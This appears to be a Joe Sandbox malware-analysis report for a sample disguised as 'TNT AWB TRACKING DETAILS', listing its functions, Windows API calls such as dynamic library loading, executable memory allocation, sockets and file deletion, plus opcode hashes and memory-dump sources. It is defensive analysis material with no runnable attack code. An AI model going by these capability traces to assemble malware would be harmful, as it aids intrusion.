                                                    • Instruction ID: 8636f544932632f8bcfb8c0c2a831f36491d3387fc2f22712a71ed24fea87b54
                                                    • Opcode Fuzzy Hash: adf31762fc5ddddd7ab2b15adc5851f8b2594c24fefd76a5428b42f18caf00af
                                                    • Instruction Fuzzy Hash: EBD0C2B0900713CFD7205F70CA08A07BAD5EF4A349B00CC3E9889D21A0E6B0C480D711
                                                    Function 00F40DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00F41039), ref: 00F40DF5
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F40E07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: 7348862616a8f8f44356c315a766b62dcbb001a3a43deea639badcbd59e57e2c
                                                    • Instruction ID: 515d598ef7bc6eef3d2f65d92ae08c4ba8baa9357dbcc3cb1fc8e87e90d193b7
                                                    • Opcode Fuzzy Hash: 7348862616a8f8f44356c315a766b62dcbb001a3a43deea639badcbd59e57e2c
                                                    • Instruction Fuzzy Hash: D6D0C770800336CFC3208F70C808A827AE4AF11362F04CC3E998AC6150EAB0D8A0EA02
                                                    Function 00F390E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F38CF4,?,00F4F910), ref: 00F390EE
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F39100
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 4ab49000aa3da0094f6a6665e419647552958067ec496340902f16d183985dcb
                                                    • Instruction ID: e24a90527d01302e33d87bece3cd5f449beae8dfacebfa1738843dc604cdf940
                                                    • Opcode Fuzzy Hash: 4ab49000aa3da0094f6a6665e419647552958067ec496340902f16d183985dcb
                                                    • Instruction Fuzzy Hash: 06D01274954713CFD7209F31D81C54676D4AF563A5F11C83AD88AD6650E6B0C884E691
                                                    Function 00F01714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: e644c9116ce673b822ae063f9a166bdc90e42f7a56d934fd7185ec28f322a27f
                                                    • Instruction ID: c9f9382e6b3d024a94d200ef2c4bbbe46defaf7e0cc5b72bbd3ce1cd1406e016
                                                    • Opcode Fuzzy Hash: e644c9116ce673b822ae063f9a166bdc90e42f7a56d934fd7185ec28f322a27f
                                                    • Instruction Fuzzy Hash: D9D0127284410DEBC7109B909988EF9777CB719311F541462F806A2080E261C759F622
                                                    Function 00F1717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1cf1a30d806392e6285aa09b52fb6e698dcc38b0fe9b024aee5e68004ed466a5
                                                    • Instruction ID: 91c932cb83ca3bcd986e9b1a3ae4cf3bf22b30669890843ec56614e6eabfb9e2
                                                    • Opcode Fuzzy Hash: 1cf1a30d806392e6285aa09b52fb6e698dcc38b0fe9b024aee5e68004ed466a5
                                                    • Instruction Fuzzy Hash: C7C16C75A04216EFCB14DFA4C884EAEBBB5FF48714B148599F809EB251D730ED81EB90
                                                    Function 00F3E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F3E0BE
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F3E101
                                                      • Part of subcall function 00F3D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F3D7C5
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F3E301
                                                    • _memmove.LIBCMT ref: 00F3E314
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: fb5f713311c1173152e893b1d00beb68f4d7616141e011fb306ecf49bebed029
                                                    • Instruction ID: 55cd3282d2003f35f2f0278932849f17992305cf4ee94d44bce8258fbd24eff1
                                                    • Opcode Fuzzy Hash: fb5f713311c1173152e893b1d00beb68f4d7616141e011fb306ecf49bebed029
                                                    • Instruction Fuzzy Hash: 43C13971A08341DFC714DF28C480A6ABBE4FF89724F14896DF8999B391D771E946CB82
                                                    Function 00F38093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00F380C3
                                                    • CoUninitialize.OLE32 ref: 00F380CE
                                                      • Part of subcall function 00F1D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F1D5D4
                                                    • VariantInit.OLEAUT32(?), ref: 00F380D9
                                                    • VariantClear.OLEAUT32(?), ref: 00F383AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: baf10106616d20f64cfa00b73daf0d89082bcb774e9f2b981580d8d44cd95d97
                                                    • Instruction ID: c16c4d849610ba690bc72994d00310a2589148f4e97dc29c64b2fc899d133358
                                                    • Opcode Fuzzy Hash: baf10106616d20f64cfa00b73daf0d89082bcb774e9f2b981580d8d44cd95d97
                                                    • Instruction Fuzzy Hash: CBA147766047019FCB04DF24C985B2AB7E4BF89764F14444CF99AAB3A2CB35ED06DB42
                                                    Function 00F17530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F52C7C,?), ref: 00F176EA
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F52C7C,?), ref: 00F17702
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00F4FB80,000000FF,?,00000000,00000800,00000000,?,00F52C7C,?), ref: 00F17727
                                                    • _memcmp.LIBCMT ref: 00F17748
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID:
                                                    • API String ID: 314563124-0
                                                    • Opcode ID: 8f94051e2e88270bf322c9184b3b94fe8eac105196bf6332a08712a8c1a98bd7
                                                    • Instruction ID: c5130c89505b6476f5364ad68227ceb9032d6d09a7d83b58927a4318e69510b4
                                                    • Opcode Fuzzy Hash: 8f94051e2e88270bf322c9184b3b94fe8eac105196bf6332a08712a8c1a98bd7
                                                    • Instruction Fuzzy Hash: FC812F75A00209EFCB04DFA4C984EEEB7B9FF89315F204558F509AB250DB71AE46DB60
                                                    Function 00F1687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: eebfae6f50708670a9d84a40d12c090c1e8adfc6067598ce3fe68f699c4ea457
                                                    • Instruction ID: 861445f675ee50362626ad647cf67f93ba34b8a3a307d67b3019d24d6f52f081
                                                    • Opcode Fuzzy Hash: eebfae6f50708670a9d84a40d12c090c1e8adfc6067598ce3fe68f699c4ea457
                                                    • Instruction Fuzzy Hash: FC51E7757003029BDB24EF65D895BBAB7E5AF45310F20D81FE586EB291DB78D8C1AB00
                                                    Function 00F2955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC4EE5: _fseek.LIBCMT ref: 00EC4EFD
                                                      • Part of subcall function 00F29734: _wcscmp.LIBCMT ref: 00F29824
                                                      • Part of subcall function 00F29734: _wcscmp.LIBCMT ref: 00F29837
                                                    • _free.LIBCMT ref: 00F296A2
                                                    • _free.LIBCMT ref: 00F296A9
                                                    • _free.LIBCMT ref: 00F29714
                                                      • Part of subcall function 00EE2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE9A24), ref: 00EE2D69
                                                      • Part of subcall function 00EE2D55: GetLastError.KERNEL32(00000000,?,00EE9A24), ref: 00EE2D7B
                                                    • _free.LIBCMT ref: 00F2971C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID:
                                                    • API String ID: 1552873950-0
                                                    • Opcode ID: c4026c6fdf79114d0ce0d5391f8c5e6d50e3694d2df04886e7dc2db769373755
                                                    • Instruction ID: aa1604f4e575f6124bde39921f0cd12ed252c08dfc0690e98affc63db3beac4c
                                                    • Opcode Fuzzy Hash: c4026c6fdf79114d0ce0d5391f8c5e6d50e3694d2df04886e7dc2db769373755
                                                    • Instruction Fuzzy Hash: 4B516DB1E04268AFDF259F65DC81A9EBBB9EF48300F10049EF209B3241DB715A81CF58
                                                    Function 00F497F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F49863
                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00F49896
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F49903
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: d5baf9b8228d6ab3d455f25dc4c6f1c2c298bb86205b892c78f576b451106c30
                                                    • Instruction ID: b66f188960989ccd553e9409c7af240c207099527de2d53eaa1786c450c3ce70
                                                    • Opcode Fuzzy Hash: d5baf9b8228d6ab3d455f25dc4c6f1c2c298bb86205b892c78f576b451106c30
                                                    • Instruction Fuzzy Hash: C0514C34A04209EFCF14CF68C880AAE7BB5FF56360F548169FC659B2A0D771AD41EB90
                                                    Function 00F19A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F19AD2
                                                    • __itow.LIBCMT ref: 00F19B03
                                                      • Part of subcall function 00F19D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F19DBE
                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F19B6C
                                                    • __itow.LIBCMT ref: 00F19BC3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: b50f4a8e35e14795027150428787c8c200e4fab8caaac1a1d664c66091d4b114
                                                    • Instruction ID: cd3b1abcdd8614a04f07b375b4f911c909f8c79028619422a40d07eef5f44d30
                                                    • Opcode Fuzzy Hash: b50f4a8e35e14795027150428787c8c200e4fab8caaac1a1d664c66091d4b114
                                                    • Instruction Fuzzy Hash: 3F41C270A08209ABDF11EF10D855FEE7BF9EF88720F000069F945A3291DBB19E85DB91
                                                    Function 00F369AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00F369D1
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F369E1
                                                      • Part of subcall function 00EC9837: __itow.LIBCMT ref: 00EC9862
                                                      • Part of subcall function 00EC9837: __swprintf.LIBCMT ref: 00EC98AC
                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F36A45
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00F36A51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                    • String ID:
                                                    • API String ID: 2214342067-0
                                                    • Opcode ID: c8b0bf5fc838f2a3587b98c231f545d4527dcdd8ace56eaf3a8521a7a8269fa9
                                                    • Instruction ID: 7f17fdd9ad325d07b0e5d3cce86723b1e062edae3fff007d8425178ba6aa8741
                                                    • Opcode Fuzzy Hash: c8b0bf5fc838f2a3587b98c231f545d4527dcdd8ace56eaf3a8521a7a8269fa9
                                                    • Instruction Fuzzy Hash: 9E41C235740200AFEB20AF24CE8AF2A77E8AB44B14F04C01CFA19AF3C3DA759D019791
                                                    Function 00F3641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F4F910), ref: 00F364A7
                                                    • _strlen.LIBCMT ref: 00F364D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID:
                                                    • API String ID: 4218353326-0
                                                    • Opcode ID: f1f42bcebeb015ebcb8e8d6529a852c50744c30336c67490d0ad54beb94e1dec
                                                    • Instruction ID: d41a9e2c49b75865f065d5a5b3c15f9e2fc21bef11bf5359fb5f1f2692d5592c
                                                    • Opcode Fuzzy Hash: f1f42bcebeb015ebcb8e8d6529a852c50744c30336c67490d0ad54beb94e1dec
                                                    • Instruction Fuzzy Hash: 1341C636900108BFCB14EBA4DD85FAEB7F9AF44320F148169F91AE7292DB30AD45D750
                                                    Function 00F2B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F2B89E
                                                    • GetLastError.KERNEL32(?,00000000), ref: 00F2B8C4
                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F2B8E9
                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F2B915
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 244682a7e9f939d7b59b643cb8215faf4b45963a8034874fa0b2a0d7f7f76e86
                                                    • Instruction ID: a1a8bf074867b9359b16ca3a28e8892efada87cf32b9a68a89bd5e9c3ed01d3c
                                                    • Opcode Fuzzy Hash: 244682a7e9f939d7b59b643cb8215faf4b45963a8034874fa0b2a0d7f7f76e86
                                                    • Instruction Fuzzy Hash: B0411C3AA00514DFCB15DF15C544E59BBE1BF4A720F058098EC4AAB362CB35FD42DB91
                                                    Function 00F48851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F488DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InvalidateRect
                                                    • String ID:
                                                    • API String ID: 634782764-0
                                                    • Opcode ID: af889a05f65c839be5b6007fbd977cb26a386c95b1b1e88d36ff1f1ddddff98d
                                                    • Instruction ID: abe846093122119ceb4794636786b1b1be0ce11ef27b84ffcca7658ca8eea1dc
                                                    • Opcode Fuzzy Hash: af889a05f65c839be5b6007fbd977cb26a386c95b1b1e88d36ff1f1ddddff98d
                                                    • Instruction Fuzzy Hash: D6310434A40508BFEF209B28CC45FBC3FA0EB067A0F544412FE15E62A1CE30D982B752
                                                    Function 00F4AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ClientToScreen.USER32(?,?), ref: 00F4AB60
                                                    • GetWindowRect.USER32(?,?), ref: 00F4ABD6
                                                    • PtInRect.USER32(?,?,00F4C014), ref: 00F4ABE6
                                                    • MessageBeep.USER32(00000000), ref: 00F4AC57
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
